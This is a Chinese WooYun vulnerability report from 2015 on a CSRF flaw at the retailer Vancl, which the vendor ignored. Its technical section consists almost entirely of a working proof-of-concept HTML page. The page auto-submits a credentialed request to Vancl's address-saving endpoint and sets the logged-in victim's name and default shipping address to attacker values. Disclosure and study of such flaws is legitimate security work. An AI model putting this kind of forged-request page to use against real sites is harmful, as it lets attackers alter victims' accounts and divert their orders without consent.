当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125482

漏洞标题:凡客诚品CSRF可导致修改他人名称及默认收货地址

相关厂商:凡客诚品

漏洞作者: Lucaroot

提交时间:2015-07-09 09:16

修复时间:2015-07-14 09:18

公开时间:2015-07-14 09:18

漏洞类型:CSRF

危害等级:低

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

见code

详细说明:

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://my.vancl.com/DeliveryAddress/Internal_SaveAddress", true);
        xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
        xhr.withCredentials = true;
        var body = "userName=%E5%B0%8F%E9%A9%AC&address=8888888&postCode=147258&phone=&mobile=18888888668&province=%e9%bb%91%e9%be%99%e6%b1%9f&city=%e4%bd%b3%e6%9c%a8%e6%96%af%e5%b8%82&area=%e6%a1%a6%e5%8d%97%e5%8e%bf&addressID=-1&actionType=Add&addressType=Inland&isDefaultAddress=true";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

漏洞证明:

1.png

修复方案:

token~

版权声明:转载请注明来源 Lucaroot@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-14 09:18

厂商回复:

最新状态:

暂无